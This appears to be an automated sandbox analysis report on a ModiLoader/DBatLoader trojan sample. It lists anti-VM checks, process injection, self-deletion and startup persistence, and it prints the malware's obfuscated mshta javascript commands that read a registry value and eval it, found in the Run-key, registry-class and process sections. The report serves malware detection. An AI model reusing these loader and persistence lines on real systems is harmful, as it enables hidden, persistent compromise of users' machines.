Malware Analysis Report

2024-10-19 07:03

Sample ID 240509-nzh6daga5s
Target 29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118
SHA256 2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a

Threat Level: Known bad

The file 29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

Process spawned unexpected child process

ModiLoader, DBatLoader

Checks for common network interception software

ModiLoader Second Stage

Looks for VirtualBox drivers on disk

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Looks for VirtualBox Guest Additions in registry

Looks for VMWare Tools registry key

Loads dropped DLL

Deletes itself

Checks computer location settings

Executes dropped EXE

Checks BIOS information in registry

Drops startup file

Adds Run key to start application

Maps connected drives based on registry

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-09 11:49

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-09 11:49

Reported

2024-05-09 11:52

Platform

win7-20231129-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMWare, Inc.\VMWare Tools C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMWare, Inc.\VMWare Tools C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:F19YYw=\"C\";G7H1=new%20ActiveXObject(\"WScript.Shell\");VyhkG26=\"5WcZ\";eyk88S=G7H1.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\hsgrudze\\\\zdxvakv\");rhJaE6dM=\"tIH\";eval(eyk88S);APEo98Kh=\"IVEXC\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:Ehc1gFBK=\"w4dgf\";xX7=new%20ActiveXObject(\"WScript.Shell\");fnKe1L3=\"z2BA\";mO40ru=xX7.RegRead(\"HKCU\\\\software\\\\hsgrudze\\\\zdxvakv\");bZF69T=\"fE\";eval(mO40ru);l7F5EKr=\"JvC6qaj\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\416844\\eecdc5.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:gTqKu5k5B=\"VzJ\";Ub28=new ActiveXObject(\"WScript.Shell\");Bdpx30mf=\"0rQ5oz\";eg9ER=Ub28.RegRead(\"HKCU\\\\software\\\\hsgrudze\\\\zdxvakv\");iw67vO=\"Y45uv\";eval(eg9ER);XMquS9=\"N\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.983f33d C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.983f33d\ = "81b494" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1660 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 2864 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 2864 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 2864 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 2864 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1344 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 2644 wrote to memory of 2624 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2624 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2624 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2624 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 1080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 1080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 1080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 1080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 1080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 1080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2624 wrote to memory of 1080 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1080 wrote to memory of 1584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1080 wrote to memory of 1584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1080 wrote to memory of 1584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1080 wrote to memory of 1584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1080 wrote to memory of 1584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1080 wrote to memory of 1584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1080 wrote to memory of 1584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1080 wrote to memory of 1584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:dxpSbwS8="e9kmcjI";I5q3=new%20ActiveXObject("WScript.Shell");lC3FPPa="9hx";ND42st=I5q3.RegRead("HKLM\\software\\Wow6432Node\\oWkmdT9U\\osp3ZocR");Fo9arfOV="9l";eval(ND42st);O1qCYBe="wTam";

C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

